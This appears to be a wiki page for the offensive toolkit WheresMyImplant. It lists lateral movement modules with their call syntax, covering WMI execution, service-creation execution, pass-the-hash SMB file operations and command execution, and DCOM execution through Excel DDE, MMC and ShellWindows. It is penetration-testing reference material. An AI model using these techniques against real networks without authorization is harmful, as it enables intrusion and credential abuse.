-
Notifications
You must be signed in to change notification settings - Fork 58
Lateral Movement Modules
Executes a WMI Method on the remote System.
[WheresMyImplant.Lateral]::WMIMethod("Target", "Username", "Password", "WMIClass", "WMIMethod", "Arguments", "Argument Delimiter")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,WMIMethod "Target","Username","Password","WMIClass","WMIMethod","Arguments","Argument Delimiter"
Executes a WMI Query on the remote System.
[WheresMyImplant.Lateral]::WMIQuery("Target", "Username", "Password", "Query")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,WMIQuery "Target","Username","Password","Query"
Executes a command via Windows Service Creation. Uses passthrough authentication.
[WheresMyImplant.Lateral]::PSExecCommand("Target", "Execute", "ComSpec")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PSExecCommand "Target","Execute","ComSpec"
Lists the contents of a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientList("UNCPath", "Domain", "Username", "Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientList "UNCPath","Domain","Username","Hash"
Retrieve a file to a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientGet("UNCPathSource","DestinationPath","Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientGet "UNCPathSource","DestinationPath","Domain","Username","Hash"
Put a file to a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientPut("SourcePath","UNCPathDestination","Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientPut "SourcePath","UNCPathDestination","Domain","Username","Hash"
Deletes a file from a remote directory via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBClientDelete("UNCPathDestination","Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBClientDelete "UNCPathDestination","Domain","Username","Hash"
Executes a command through Windows Service Creation via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHSMBExec("Target", "Command", "Domain", "Username", "Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHSMBExec "Target","Command","Domain","Username","Hash"
Executes a command through WMI Win32_Process via Pass-The-Hash. Based off of Invoke-TheHash.
[WheresMyImplant.Lateral]::PTHWMIExec("Target", "Command", "Domain","Username","Hash")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,PTHWMIExec "Target","Command","Domain","Username","Hash"
Executes a command through DCOM via Excel's DDE provider.
[WheresMyImplant.Lateral]::DComExcelDDE("Target", "Command", "Arguments")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComExcelDDE "Target","Command","Arguments"
Executes a command through DCOM via MMC.
[WheresMyImplant.Lateral]::DComMMC("Target", "Command", "Arguments", "IsVisible")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComMMC "Target","Command","Arguments","IsVisible"
Executes a command through DCOM via ShellWindows.
[WheresMyImplant.Lateral]::DComShellWindows("Target", "Command", "Arguments")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComShellWindows "Target","Command","Arguments",
Executes a command through DCOM via MMC.
[WheresMyImplant.Lateral]::DComShellBrowserWindow("Target", "Command", "Arguments")
rundotnetdll32.exe WheresMyImplant.dll,WheresMyImplant,Lateral,DComShellBrowserWindow "Target","Command","Arguments"